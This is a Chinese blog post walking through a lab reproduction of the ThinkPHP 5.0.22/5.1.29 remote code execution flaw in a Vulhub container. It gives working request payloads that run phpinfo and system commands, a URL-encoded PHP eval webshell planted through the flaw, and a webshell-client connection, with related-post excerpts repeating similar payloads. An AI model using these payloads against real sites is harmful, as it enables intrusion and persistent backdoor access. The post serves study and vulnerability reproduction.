Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接(复现详细过程)

已于 2023-06-20 11:15:34 修改
阅读量2.8k 收藏 2
点赞数 1
分类专栏: 中间件漏洞 文章标签: php 安全 开发语言
于 2023-03-19 09:00:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52701599/article/details/129646523
版权

漏洞介绍

       ThinkPHP是国内使用极为广泛的PHP开发框架。由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。

       影响版本:Thinkphp5 5.0.22/5.1.29

漏洞复现

1.环境搭建

这里是使用Ubuntu虚拟机基于vulhub漏洞集成环境生成靶场

进入 Vulhub 对应的漏洞路径下:cd /vulhub/thinkphp/5-rce

执行命令docker-compose up -d编译并运行靶场容器:

通过局域网内 Win 10 物理机访问http://your-ip:8080,可以看到ThinkPHP的默认页面:

 

到此漏洞环境就搭建完成了(docker就是这么高效)

2.漏洞利用

Poc1

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

 直接拼接在your-id:8080后面,访问就会出现phpinfo页面:

 Poc2

//index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

直接拼接在your-id:8080后面,就会看到页面回显出执行id指令的信息:

 在此处发现了文件上传的点,接下来进行webshell文件的上传。

首先我们先将一句话木马进行url编码:

编码结果:%3C%3Fphp%20%40eval(%24_POST%7B2333%7D)%20%3B%3F%3E

我们将此编码拼接在上面提到的id位置,进行文件上传,看到网页出现回显:

 证明webshell文件上传成功。

3.webshell连接

利用中国蚁剑进行连接:

输入上传webshell所在的url地址,还有一句话木马里面包含的密码。

 连接成功,可以看到网站的目录:

六十亿少女的梦
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
NLXHBM的博客
04-16 2989
1.使用以下payload获取phpinfo: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 2.构造要执行的payload,获取网站目录文件: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&
thinkPHP5.0.22
12-06
ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业...
thinkphp5 5.0.22/5.1.29远程代码执行漏洞
最新发布
weixin_45653478的博客
04-27 891
ThinkPHP是中国使用极为广泛的PHP开发框架。在其版本 5 中,由于框架错误地处理了控制器名称,如果网站未启用强制路由(默认),它可以执行任何方法,从而导致 RCE 漏洞
ThinkPHP5 5.0.22/5.1.29 RCE】
xhwfa的博客
05-02 3160
一、漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,因为没有正确处理控制器名,致使在网站没有开启强制路由的状况下(即默认状况下)能够执行任意方法,从而致使远程命令执行漏洞。 二、影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 三、漏洞环境搭建 cd /vulhub-master/thinkphp/5-rce docker-compose up -d 访问192.168.110.134:8080,出现如
thinkphp漏洞复现ThinkPHP5 5.0.22 5.1.29 RCE、ThinkPHP5 5.0.23 RCE
不想当脚本小子的脚本小子
02-07 505
ThinkPHP5 5.0.22 5.1.29 RCE: http://note.youdao.com/noteshare?id=c8f01a93856f614a19aa906b98c73e82&sub=C7F1CA77B84C481CB0747B92FC4C997E ThinkPHP5 5.0.23 RCE: http://note.youdao.com/noteshare?id=fcdcfcfd9ea03205cbf5f4af3039a2d8&sub=8C55F64E39D7.
Thinkphp5.0.23远程命令执行
Cover-3321的博客
01-03 1922
thinkphp远程命令执行漏洞 php的一个开发框架,5,0.23及以前的版本中,获取method的方法中没有正确处理方法 名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞复现
weixin_52685785的博客
03-15 268
用HackBar 插件向其发送请求,查看是否存在远程执行漏洞。进入vulhub中漏洞环境的目录,启动环境。将一句话木马进行base64加密并进行上传。出现报错,进入需要修改的文档。访问shell.php
记录一期Thinkphp5 WebShell木马渗透的经历, 加修复建议
DWH的博客
12-26 7915
ThinkPHP的宗旨是简化开发、提高效率、易于扩展,其在对数据库的支持方面已经包括MySQL、MSSQL、Sqlite、PgSQL、 Oracle,以及PDO的支持。ThinkPHP有着丰富的文档和示例,框架的兼容性较强,但是其功能有限,因此更适合用于中小项目的开发。 但是漏洞也层出不穷,有一天发现自己的的小程序突然打不开了, What ??? 小小的网站也被墙了? 之前抱着一种心态 想着 这么小的网站谁想搞你 然后对网络安全方面视而不理,结果有一天 被啪啪打脸!! 当时很惊慌,未了解网络渗透方面的知识
Thinkphp-5-0远程代码执行漏洞1
08-03
Thinkphp-5-0远程代码执行漏洞1
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
ThinkPHP5远程代码执行高危漏洞(附:升级修复解决方法)
热门推荐
dabao87的博客
12-12 2万+
漏洞描述 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell漏洞评级 严重 影响版本 ThinkPHP 5.0系列 &lt; 5.0.23 ThinkPHP 5.1系列 &lt; 5.1.31 安全版本 ThinkPHP 5.0系列 5.0.23 ThinkPHP 5.1系列 5.1.31 ...
thinkphp5.0.23 远程代码执行复现
qq_38807738的博客
02-08 7066
漏洞影响版本5.0.23之前的版本 我使用的是vulhub下提供的漏洞环境,如何使用自行百度谷歌。 装好后打开网站如下   使用如下poc,即可实现远程代码执行 POST /index.php?s=captcha HTTP/1.1 Host: 你的id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Ge...
tp5远程代码执行漏洞
$coding的博客
01-09 9374
1.查看网站版本信息 /index.php?s=index/\think\app/invokefunction&amp;amp;amp;function=phpinfo&amp;amp;amp;vars[0]=1 index.php?s=index/think\app/invokefunction&amp;amp;amp;function=call_user_func_array&amp;amp;amp;vars[0]=system&amp;amp;amp;vars[
ThinkPHP 5.x 远程命令执行漏洞复现(GetShell
北风
12-12 1万+
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/84977739 一、简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.05.1...
ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell)(转载)
weixin_33709590的博客
12-11 274
2019独角兽企业重金招聘Python工程师标准>>> ...
Thinkphp5.1 ~ 5.2代码执行漏洞
公众号shadow sock7
01-16 9808
需要在library/think/Error.php中设置: error_reporting(0); http://proxy.boomeye.com:19300/wordpress/index.php/2019/01/15/thinkphp5-1-5-2-rec/ 设置前(默认情况下): 设置后: payload: POST /thinkphp-5.1.29/html/public/ind...
thinkphp 远程代码执行原理
01-12
根据提供的引用内容,ThinkPHP远程代码执行漏洞的原理是由于ThinkPHP框架对控制器名和方法名没有进行足够的检测,导致攻击者可以构造恶意请求来执行远程代码。 攻击者可以通过构造特定的请求,利用未正确处理的方法名来调用Request类的任意方法,并构造利用链来执行远程代码。这种漏洞可以被攻击者利用来执行恶意代码,从而导致系统被入侵或数据泄露的风险。 为了防止这种漏洞开发者应该对控制器名和方法名进行严格的检测和过滤,确保只允许合法的请求被执行。此外,及时更新框架版本也是非常重要的,因为官方通常会发布安全更新来修复这类漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值